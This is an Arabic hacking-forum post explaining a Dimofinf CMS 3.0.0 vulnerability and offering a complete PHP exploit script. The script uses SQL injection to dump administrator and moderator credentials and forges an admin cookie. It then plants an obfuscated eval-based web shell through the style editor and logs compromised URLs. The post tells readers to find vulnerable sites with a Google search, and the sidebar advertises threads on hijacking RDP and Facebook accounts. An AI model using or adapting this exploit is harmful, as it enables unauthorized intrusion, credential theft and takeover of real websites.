منظمة الانونيموس الاسلامية للاختراق
اهلا بك فى منظمة انيموس الاسلامية للاختراق

دخول

لقد نسيت كلمة السر

بحـث
 
 

نتائج البحث
 


Rechercher بحث متقدم

المواضيع الأخيرة
» الحصول على VPS مجانا
السبت 02 يونيو 2018, 4:38 pm من طرف Chuchi

» موقع يعطيك سيرفر في بي اس لمدة شهر - هديه لعيون المنظمه
الأحد 13 مايو 2018, 10:41 pm من طرف anamax

» الدرس الأول ~ الحصول على RDP مجانا ~ دورة الهويـات المجهــولة
الأحد 06 مايو 2018, 1:01 pm من طرف yoyotam

» 10 Days Free Vps Trial 4GB ram+4Cpu
الأحد 29 أبريل 2018, 12:39 am من طرف meno2015r222

»  برنامج اللفلفة ل Conquer Online كااااااامل مكمل باشرح
الأحد 22 أبريل 2018, 7:01 pm من طرف mado40

» اختراق الفيس بوك بالعملاق جوجل
الخميس 12 أبريل 2018, 9:00 pm من طرف ياسين الحنين

» Get 30 days VPS in 30 seconds
الأحد 08 أبريل 2018, 10:56 am من طرف alwayshere2

» شرح كامل الحصول على rdp وكسر البرافيت لعيونكم ^_
الأحد 08 أبريل 2018, 10:54 am من طرف alwayshere2

» طريقتي في جلب حسابات rdp
الثلاثاء 03 أبريل 2018, 7:48 pm من طرف adam42

يوليو 2018
الإثنينالثلاثاءالأربعاءالخميسالجمعةالسبتالأحد
      1
2345678
9101112131415
16171819202122
23242526272829
3031     

اليومية اليومية

تدفق ال RSS


Yahoo! 
MSN 
AOL 
Netvibes 
Bloglines 


المتواجدون الآن ؟
ككل هناك 10 عُضو متصل حالياً :: 0 عضو مُسجل, 0 عُضو مُختفي و 10 زائر :: 1 روبوت الفهرسة في محركات البحث

لا أحد

[ مُعاينة اللائحة بأكملها ]


أكبر عدد للأعضاء المتواجدين في هذا المنتدى في نفس الوقت كان 176 بتاريخ الخميس 03 نوفمبر 2016, 12:28 am

شرح ثغرة DimofInF Cms 3.0.0

اذهب الى الأسفل

شرح ثغرة DimofInF Cms 3.0.0

مُساهمة من طرف Admin في الثلاثاء 15 يوليو 2014, 2:55 am

نقوم بفك الهاش والدخول الى اللوحة وهذا مسار اللوحة
dimcp مسار لوحة التحكم

دورك بحث بجوجل

Powered by Dimofinf cms Version 3.0.0

وفى النهايةارجو منكم الابتعاد عن المواقع الاسلامية وانا بريء‏ من يستخدمها ضد العرب
هنا نقوم بجالب الموقع المستهدف وهذا كمثال


الاتسغلال..
احفظه بامتداد php
الكود


<?php

set_time_limit(0);
error_reporting(0);
/*
####################
# by Ali , UzunDz
# UzunDz@gmail.com
# sec4ever.com
####################

# Vuln Code :

else if ( $dimofinf->GPC['action'] == "detailstat" )
{
$outdata = "<table class=\"tborder\" width=\"100%\">";
$fintotal = 0;
$unusr_total = $dimofinf->db->query_read_slave( "SELECT module,COUNT(*) AS total FROM ".TABLE_PREFIX."online WHERE ip='".$_REQUEST[ip]."' GROUP BY module ORDER BY total DESC" );
[...]
}
ip='".$_REQUEST[ip]."' // inject via post to bypass fllter
POST_DATA : ip=|sql]
*/

if(isset($_POST['SQli']) && $_POST['url'] != ""){
$url = $_POST['url'];

$cURL2 = curl_init();
curl_setopt($cURL2,CURLOPT_RETURNTRANSFER,1);
curl_setopt($cURL2,CURLOPT_URL,$url);
curl_setopt($cURL2,CURLOPT_USERAGENT,'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
$cURLex = curl_exec($cURL2);

echo "<textarea cols='80' rows='10' >";
$url = $_POST['url'];
$adminfo = "ip=dz'/**//*!12345%55NION*//**//*!%53ELECT*//**/1,concat(0x3c783030783e,id,0x3a,username,0x3a,password,0x3a,email,0x3c2f783030783e)/**//*!from*//**//*!profile*//**/%23";
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL,"$url/online.php?action=detailstat");
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS,$adminfo);
curl_setopt($curl, CURLOPT_HEADER, false);
$exec=curl_exec($curl);
curl_close($curl);
preg_match("#<x00x>(.*?)</x00x>#" ,$exec,$res1);
$admres = explode(":",$res1[1]);
echo "[+] $url";
echo check($url);
echo cpuser($url);
echo "\n[+] Admin :\nid : $admres[0]\nuser : $admres[1]\npass : $admres[2]\nemail : $admres[3]\n\n";
$cook = "dimadmlogin=$admres[1]-$admres[2]-1445767838";
echo "cookie : ".$cook;
for($LIMIT=1;$LIMIT<5000;$LIMIT++){
$modinfo = "ip=dz'/**//*!12345%55NION*//**//*!%53ELECT*//**/1,concat(0x3c783030783e,id,0x3a,username,0x3a,password,0x3a,email,0x3c2f783030783e) from moderators LIMIT ".$LIMIT.",1/**/%23";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$url/online.php?action=detailstat");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,$modinfo);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, false);
$exec=curl_exec($ch);
curl_close($ch);
preg_match("#<x00x>(.*?)</x00x>#" ,$exec,$res2);
if(empty($res2)){break;}
$modres = explode(":",$res2[1]);
echo "\n[+] Moderators id=$modres[0] :\nid : $modres[0]\nuser : $modres[1]\npass : $modres[2]\nemail : $modres[3]\n\n";
}
echo "</textarea><br /><br />";
upload($url,$cook);
}
function upload($url,$cook){ /* if admin panel not protected with firewall , the function may be upload a shell */
//$payload = "%3C%3F%0D%0Aecho+%27x00x_BOT%3Cform+action%3D%22%22+method%3D%22POST%22+%3E%0D%0A%3Cinput+type%3D%22text%22+name%3D%22id%22++%3E%0D%0A%3C%2Fform%3E%27%3B%0D%0Aif+%28%40%24_POST%5B%27id%27%5D%29%7B%0D%0A%24s%3D%22str%22.%22iPs%22.%22las%22.%22hes%22%3B%0D%0AeVaL%28%24s%28%24_POST%5B%27id%27%5D%29%29%3B%0D%0A%7D%0D%0A%3F%3E";
$x00x = curl_init();
curl_setopt($x00x, CURLOPT_URL, $url."/dimcp/style.php?action=edit&stylef=default");
curl_setopt($x00x, CURLOPT_COOKIE, $cook);
curl_setopt($x00x, CURLOPT_POST, 1);
curl_setopt($x00x, CURLOPT_POSTFIELDS,'template=../../x00x_BOT.php&newtext=%3C%3F%0D%0Aecho+%27x00x_BOT%3Cform+action%3D%22%22+method%3D%22POST%22+%3E%0D%0A%3Cinput+type%3D%22text%22+name%3D%22id%22++%3E%0D%0A%3C%2Fform%3E%27%3B%0D%0Aif+%28%40%24_POST%5B%27id%27%5D%29%7B%0D%0A%24s%3D%22str%22.%22iPs%22.%22las%22.%22hes%22%3B%0D%0AeVaL%28%24s%28%24_POST%5B%27id%27%5D%29%29%3B%0D%0A%7D%0D%0A%3F%3E&edit=%CA%CD%D1%ED%D1');
curl_setopt($x00x,CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0");
curl_setopt($x00x,CURLOPT_RETURNTRANSFER,1);
$res = curl_exec($x00x);
//print_r($res);
if(eregi("x00x_BOT",@file_get_contents($url."/x00x_BOT.php"))){
echo "[+] <a href='".$url."/x00x_BOT.php'>".$url."/x00x_BOT.php</a> -> Upload Success\n";
file_put_contents("dimofinf-up.txt","$url/x00x_BOT.php\n",FILE_APPEND);
}else {echo "[+] $url/ -> Upload Filed\n";}
}
function check($url){ /* check the panel if protected or not */

if(preg_match('<div class="tcat" align="center">',file_get_contents("$url/dimcp/"))){
echo " -> Admin panel Not Protected\n";
}else {
echo " -> Admin panel Protected\n";
}
}
function cpuser($url){ /* get cpanel user from local file disclosure vuln */
$x = preg_match("/Table '(.*?)_/",file_get_contents("$url/search.php?action=startsearch&keyword=uzundz&searchin=albumss&submit="),$cp);
if($x){
echo "Cpanel User -> ".$cp[1];}
}
?>

و افتحه عادي http://127.0.0.1/ex.php
وستجد فورم حط فيه الموقع و السكربت يقوم بالاستغلال واستخراج المعلومات
رابط الثغرة
avatar
Admin
Admin
Admin

عدد المساهمات : 1255
تاريخ التسجيل : 22/11/2011
العمر : 22
الموقع : http://ahmed2012.yoo7.com

http://ahmed2012.yoo7.com

الرجوع الى أعلى الصفحة اذهب الى الأسفل

الرجوع الى أعلى الصفحة


 
صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى